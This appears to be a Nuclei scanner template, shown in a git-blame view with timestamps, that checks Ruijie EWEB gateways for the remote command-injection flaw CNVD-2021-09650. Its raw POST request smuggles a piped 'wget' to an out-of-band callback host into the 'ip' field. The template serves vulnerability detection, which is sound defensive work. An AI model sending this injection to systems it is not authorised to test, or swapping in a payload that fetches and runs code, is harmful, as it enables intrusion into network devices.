2022-02-25 16:33:59 +00:00
|
|
|
id: CNVD-2021-09650
|
|
|
|
|
|
|
|
info:
|
2022-11-01 13:21:02 +00:00
|
|
|
name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
|
|
|
|
author: daffainfo,pikpikcu
|
2022-02-25 16:33:59 +00:00
|
|
|
severity: critical
|
2022-05-13 20:26:43 +00:00
|
|
|
description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
|
2022-11-01 13:21:02 +00:00
|
|
|
- https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
|
|
|
|
- https://www.ruijienetworks.com
|
2022-05-13 20:26:43 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
2023-10-14 11:27:55 +00:00
|
|
|
cvss-score: 10
|
2022-05-13 20:26:43 +00:00
|
|
|
cwe-id: CWE-77
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cnvd,cnvd2021,ruijie,rce
|
2022-02-25 16:33:59 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-02-25 16:33:59 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
2024-05-07 10:24:07 +00:00
|
|
|
POST /guest_auth/guestIsUp.php HTTP/1.1
|
2022-02-25 16:33:59 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
|
2022-02-26 21:23:26 +00:00
|
|
|
mac=1&ip=127.0.0.1|wget {{interactsh-url}}
|
2022-02-25 16:33:59 +00:00
|
|
|
|
2022-02-26 21:23:26 +00:00
|
|
|
unsafe: true
|
2022-02-25 16:33:59 +00:00
|
|
|
matchers:
|
2022-02-26 21:23:26 +00:00
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol
|
|
|
|
name: http
|
|
|
|
words:
|
|
|
|
- "http"
|
2024-05-07 11:49:03 +00:00
|
|
|
# digest: 4a0a00473045022067cf25f298daa2b560fc63730df160e8dec545619c2157c63da48b60dd2135e8022100eb4e2b096d6e640659ad337e303506d4a65d47211414037ec52449106f264578:922c64590222798bb761d5b6d8e72950
|